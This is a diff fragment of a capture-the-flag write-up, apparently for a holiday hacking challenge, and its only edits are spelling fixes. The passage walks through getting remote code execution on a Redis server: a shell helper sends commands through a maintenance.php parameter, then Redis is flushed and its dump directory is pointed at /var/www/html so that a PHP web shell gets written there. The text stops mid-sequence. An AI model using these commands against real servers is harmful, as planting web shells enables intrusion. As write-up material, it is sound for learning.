spartantri/kringle2020/docs/achivements/A-Redis/A-Redis.md

 ```

 ## Full RCE
-We can achive upload a simple RCE php with the following sequence.
+We can achieve upload a simple RCE php with the following sequence.
 1. Load our helper function to simplify the exploitation
 ```
 function cmd {
   curl "localhost/maintenance.php?cmd=$1"
   }
 ```
-2. Flush the database to avoid undesired content, configure redis to store out databse content into a php file and save the database.
+2. Flush the database to avoid undesired content, configure redis to store out database content into a php file and save the database.
 ```
 cmd flushall
 cmd config,set,dir,/var/www/html